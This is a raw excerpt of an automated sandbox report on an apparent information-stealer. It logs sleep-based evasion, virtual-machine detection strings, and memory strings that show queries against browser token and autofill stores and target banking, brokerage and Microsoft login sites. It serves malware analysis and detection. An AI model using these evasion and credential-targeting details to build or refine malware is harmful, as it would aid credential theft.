Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 8088 Thread sleep count: 57 > 30
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 8088 Thread sleep time: -114057s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 8096 Thread sleep count: 72 > 30
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 8096 Thread sleep time: -144072s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 8080 Thread sleep count: 61 > 30
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 8080 Thread sleep time: -122061s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 8056 Thread sleep count: 303 > 30
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 8056 Thread sleep time: -9090000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 7868 Thread sleep time: -360000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 8076 Thread sleep count: 8437 > 30
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 8076 Thread sleep time: -16882437s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe TID: 2676 Thread sleep time: -23058430092136925s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe TID: 6624 Thread sleep time: -23980767295822402s >= -30000s
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Last function: Thread delayed
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Thread sleep count: Count: 1149 delay: -10
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Thread sleep count: Count: 1231 delay: -10
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Thread sleep count: Count: 1415 delay: -10
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\rundll32.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\rundll32.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Thread delayed: delay time: 180000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\Videos\desktop.ini
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\Music\desktop.ini
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\OneDrive\desktop.ini
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local
Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: formVMware20,11696428655
Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696xa
Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ccount.microsoft.com/profileVMware20,11696428655u
Source: 831840b410.exe, 00000010.00000002.3115654406.0000000000FCA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: MPGPH131.exe, 0000001C.00000003.3062426887.0000000007CBF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CT service, encrypted_token FROM token_servicerr global passwords blocklistVMware20,11696428655
Source: MPGPH131.exe, 0000001C.00000003.3062426887.0000000007CBF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696
Source: c884f8452a.exe, 00000014.00000003.2982037903.000000000811B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: .comVMware20,11696428
Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,1169642865j
Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: r global passwords blocklistVMware20,11696428655
Source: MPGPH131.exe, 0000001C.00000003.3062426887.0000000007CBF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,1169642865h
Source: MPGPH131.exe, 0000001C.00000002.3251490227.0000000007C50000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}lfons\AppData\Local\Temp\heidivqkoBMIvF7c3\yFCGJeJiS2CNWeb Dataion VA
Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware20,11696428655
Source: MPGPH131.exe, 0000001C.00000002.3245487291.00000000013C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&
Source: MPGPH131.exe, 0000001D.00000003.3065747274.00000000079F1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696428655
Source: MPGPH131.exe, 0000001D.00000003.3065747274.00000000079F1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696428655o
Source: MPGPH131.exe, 0000001D.00000003.3065747274.00000000079F1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: c884f8452a.exe, 00000014.00000003.2982037903.000000000811B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ebrokers.co.inVMware20,11696428655d
Source: c884f8452a.exe, 00000014.00000002.3272062949.000000000168F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}M`p
Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CT name, value FROM autofillmain'.sqlite_masterr global passwords blocklistVMware20,11696428655
Source: MPGPH131.exe, 0000001C.00000002.3245487291.00000000013F7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}\*
Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: explorha.exe, explorha.exe, 00000003.00000002.2151500663.00000000008EF000.00000040.00000001.01000000.00000008.sdmp, amert.exe, amert.exe, 0000000E.00000002.2840617908.0000000000556000.00000040.00000001.01000000.0000000F.sdmp, chrosha.exe, 0000000F.00000002.2880866448.0000000000266000.00000040.00000001.01000000.00000010.sdmp, c884f8452a.exe, 00000014.00000002.3269980553.0000000000D6E000.00000040.00000001.01000000.00000014.sdmp, MPGPH131.exe, 0000001C.00000002.3244453808.0000000000B5E000.00000040.00000001.01000000.00000015.sdmp, MPGPH131.exe, 0000001D.00000002.3252347370.0000000000B5E000.00000040.00000001.01000000.00000015.sdmp, c884f8452a.exe, 00000024.00000002.3145407488.0000000000D6E000.00000040.00000001.01000000.00000014.sdmp, RageMP131.exe, 0000002D.00000002.3204809220.000000000063E000.00000040.00000001.01000000.00000017.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: c884f8452a.exe, 00000014.00000002.3272062949.000000000167A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW =k
Source: MPGPH131.exe, 0000001C.00000002.3245487291.00000000013D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ?\#disk&ven_vmware&prouask#4&1656f219&0&0000f5-b6bf-11d0-94f2-00a08b
Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696428655f
Source: RageMP131.exe, 0000002D.00000003.3144245338.00000000017DF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,116
Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428
Source: MPGPH131.exe, 0000001D.00000002.3253650821.00000000012A1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}x%
Source: MPGPH131.exe, 0000001D.00000003.3065747274.00000000079F1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: MPGPH131.exe, 0000001D.00000003.3065747274.00000000079F1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: MPGPH131.exe, 0000001D.00000003.3065747274.00000000079F1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: MPGPH131.exe, 0000001D.00000003.3065747274.00000000079F1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428655s
Source: MPGPH131.exe, 0000001D.00000003.3065747274.00000000079F1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: MPGPH131.exe, 0000001D.00000003.3065747274.00000000079F1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: RageMP131.exe, 0000002D.00000003.3144245338.00000000017DF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}<
Source: c884f8452a.exe, 00000014.00000002.3272062949.00000000016CC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}*
Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rootpagecomVMware20,11696428655o
Source: c884f8452a.exe, 00000014.00000003.2982037903.000000000811B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: s.portal.azure.comVMware20,11696428655
Source: c884f8452a.exe, 00000014.00000003.2982037903.000000000811B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696
Source: MPGPH131.exe, 0000001D.00000003.3065747274.00000000079F1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: RageMP131.exe, 0000002D.00000002.3206727588.00000000017DC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}!
Source: MPGPH131.exe, 0000001C.00000003.3062426887.0000000007CBF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428p
Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: pageformVMware20,11696428655
Source: 831840b410.exe, 0000001F.00000003.3237964866.0000000004062000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\m
Source: MPGPH131.exe, 0000001D.00000003.2969808776.0000000001284000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6b
Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696428655j
Source: MPGPH131.exe, 0000001D.00000003.3065747274.00000000079F1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: MPGPH131.exe, 0000001D.00000002.3260757823.0000000007A1E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}cGVhZm1tZ2RwZmtvZ2tnaGNwaWhh2j4FMS4yLjDgPtDD9agG6D4A6D4G6D4L8D7Qw/WoBsoBWggBEAUYAiAAKAAwADgAQABIAFAAWABgAGgAeACAAQDIPgPSPiBtaGpmYm1kZ2NmamJicGFlb2pvZm9ob2VmZ2llaGphado+ATHgPtDD9agG6D4A8D7Qw/WoBsoBXggBEAUYAiAAKAAwADgAQABIAFAAWABgAGgCeACAAQDIPgPSPiBuY2JqZWxwamNoa3BiaWticGtjY2hraGtibG9kb2FtYdo+BTIuMC4y4D7Qw/WoBug+APA+0MP1qAbKAV8IARAFGAIgACgAMAA4AEAASABQAFgAYABoAngAgAEAyD4D0j4gbmtlaW1ob2dqZHBucGNjb29mcGxpaW1hYWhtYWFvbWXaPgYxLjMuMjHgPtDD9agG6D4A8D7Qw/WoBvgBsiiAAv///////////wGIAgGoAoQXsgIQd6OHVV3LMHKvjeie9v2i18o+1wcKBAgAEAASEgoCCAMSAggIGgIIASIECAAQARoPCg1ub19lbnYtbm9fdmVyIgIIAjJiCAAaLDQ3REVRcGo4SEJTYSsvVEltVys1SkNldVFlUmttNU5NcEpXWkczaFN1RlU9Ii4icFpMaFRhSjIzaE41dVF4d3p1MEsyQ1llcy9kdkp1RTkzVmJJVlYvTG5SQT0iKgA6Cwjz///v9/////8BQikSCjEuMy4xNzcuMTEYBSAAKg5SZWdLZXlOb3RGb3VuZDIHd2luZG93c1ICCAFa/AUJdZMYBFaWU0AR3SQGgZVTRkAZAAAAAAAAWUAZAAAAAAAANEAZAAAAAAAAWUAZAAAAAAAA8D8ZAAAAAAAA8D8ZAAAAAAAAAAAZAAAAAAAAAAAZAAAAAAAAWUAZAAAAAAAAWUAZAAAAAAAAWUAZAAAAAAAAWUAZAAAAAAAAWUAZAAAAAAAAWUAZAAAAAAAAWUAZAAAAAAAANEAZAAAAAAAAWUAZAAAAAAAAAAAZAAAAAAAAWUAZAAAAAAAAWUAZAAAAAAAAWUAZAAAAAAAA8D8ZAAAAAAAA8D8yFQiH9N6X29eyvKYBEggIABABIJCABDISCNvpsoebrM36GRIGCAAQASAQMhII++qnh8mYwYhfEgYIABABIBAyEgjozNnlpJyeyzkSBggAEAEgEDITCOC54qSdyuvjjgESBggAEAEgEDISCNn9xMr9td2KbRIGCAAQASAQMhIIgteJ4NSXj9E2EgYIABABIBAyEgjmzv2twIj8gn4SBggAEAEgEDIUCKfHy9mkub6BwwESBwgBEAEgkGAyFQiauYjc7KfS3OEBEggIABABIJCABDITCJnwsYm4+NWOLBIHCAEQASCQYDIUCNHJvLvV2cza5wESBwgBEAEgkGAyEwiQrNz7jbLTpQwSBwgBEAEgkGAyEgjVuuKf55342XkSBggAEAEgEDITCPeTqZiGj5aaSRIHCAEQASCQYDISCLPMhM/6sZX2NRIGCAAQASAQMhIIh6SA76Kw0u9WEgYIABABIBAyEwjcx7n5qNnem6MBEgYIABABIBAyFAjKvKW5jY/Wx+cBEgcIARABIJBgMhQIwqf5grzUgKTqARIHCAEQASCQYDIWCJiYntn49dXkggESCQgAEAEggICACDITCMuAzLDq3NSUzwESBggAEAEgEDITCIS9vZeNgI79kgESBggAEAEgEDITCP7Mx9PU/OC9iQESBggAEAEgEDISCNKq8
/iqnu6OFRIGCAAQASAQMhQImuHa5M/ohPHnARIHCAEQASCQYHoCCACCAQIYAA==metameta
Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe, 00000000.00000002.2139776155.0000000000D6F000.00000040.00000001.01000000.00000003.sdmp, explorha.exe, 00000002.00000002.2131038035.00000000008EF000.00000040.00000001.01000000.00000008.sdmp, explorha.exe, 00000003.00000002.2151500663.00000000008EF000.00000040.00000001.01000000.00000008.sdmp, amert.exe, 0000000E.00000002.2840617908.0000000000556000.00000040.00000001.01000000.0000000F.sdmp, chrosha.exe, 0000000F.00000002.2880866448.0000000000266000.00000040.00000001.01000000.00000010.sdmp, c884f8452a.exe, 00000014.00000002.3269980553.0000000000D6E000.00000040.00000001.01000000.00000014.sdmp, MPGPH131.exe, 0000001C.00000002.3244453808.0000000000B5E000.00000040.00000001.01000000.00000015.sdmp, MPGPH131.exe, 0000001D.00000002.3252347370.0000000000B5E000.00000040.00000001.01000000.00000015.sdmp, c884f8452a.exe, 00000024.00000002.3145407488.0000000000D6E000.00000040.00000001.01000000.00000014.sdmp, RageMP131.exe, 0000002D.00000002.3204809220.000000000063E000.00000040.00000001.01000000.00000017.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: MPGPH131.exe, 0000001D.00000002.3260532533.0000000007940000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}u.gn,v.gn,w.gn,x.gn,y.gn,z.gn,a.hk,b.hk,c.hk,d.hk,e.hk,f.hk,g.hk,h.hk,i.hk,j.hk,k.hk,l.hk,m.hk,n.hk,o.hk,p
Source: MPGPH131.exe, 0000001D.00000003.3065747274.00000000079F1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: c884f8452a.exe, 00000014.00000003.2982037903.000000000811B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: billing_address_id.comVMware20,11696428
Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: c884f8452a.exe, 00000014.00000003.2982037903.000000000811B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: .utiitsl.comVMware20,1169642865
Source: MPGPH131.exe, 0000001D.00000003.3065747274.00000000079F1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696428655
Source: MPGPH131.exe, 0000001D.00000002.3260532533.0000000007940000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}<
Source: rundll32.exe, 00000008.00000002.2871819933.000001E17AF41000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.2871819933.000001E17AE8F000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000002.3272062949.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000002.3272062949.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000002.3245487291.00000000013F7000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000002.3245487291.00000000013C7000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000002.3253650821.00000000012A1000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000024.00000002.3143187486.00000000005F0000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000024.00000002.3143187486.00000000005C0000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000024.00000002.3143187486.000000000060A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: MPGPH131.exe, 0000001D.00000003.3065747274.00000000079F1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: MPGPH131.exe, 0000001D.00000003.2969808776.0000000001284000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: eVMware20,11696428655
Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,1169642865
Source: c884f8452a.exe, 00000014.00000002.3280096095.0000000007EE5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}-
Source: MPGPH131.exe, 0000001D.00000003.3065747274.00000000079F1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: c884f8452a.exe, 00000014.00000003.2980525075.0000000008111000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428(
Source: MPGPH131.exe, 0000001C.00000002.3245487291.00000000013F7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}ta\*
Source: MPGPH131.exe, 0000001C.00000003.2969098995.00000000013DF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}p.
Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: c884f8452a.exe, 00000014.00000003.2982037903.000000000811B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: nickname.utiitsl.comVMware20,1169642865
Source: MPGPH131.exe, 0000001D.00000003.3065747274.00000000079F1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: c884f8452a.exe, 00000024.00000003.3078423333.00000000005D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ra Change Transaction PasswordVMware20,11696428655
Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: o.inVMware20,11696428655~
Source: MPGPH131.exe, 0000001D.00000003.3065747274.00000000079F1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: c884f8452a.exe, 00000014.00000003.2910333691.0000000001691000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}Cry
Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: RageMP131.exe, 0000002D.00000002.3206727588.00000000017C8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&
Source: c884f8452a.exe, 00000014.00000003.2910333691.0000000001691000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: c884f8452a.exe, 00000014.00000002.3272062949.000000000168F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000{`p
Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: HARtive Brokers - non-EU EuropeVMware20,11696428655
Source: MPGPH131.exe, 0000001D.00000003.3065747274.00000000079F1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: c884f8452a.exe, 00000014.00000003.2980525075.0000000008111000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,1169642865
Source: MPGPH131.exe, 0000001D.00000003.3065747274.00000000079F1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: c884f8452a.exe, 00000014.00000002.3272062949.00000000016CC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}x
Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: RageMP131.exe, 0000002D.00000002.3206727588.00000000017FA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWg>_I
Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: comVMware20,11696428655o
Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: MPGPH131.exe, 0000001D.00000003.3065747274.00000000079F1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: netsh.exe, 00000009.00000002.2741856372.000001F406E37000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000009.00000003.2741173735.000001F406E34000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 831840b410.exe, 00000010.00000002.3115654406.0000000000FCA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
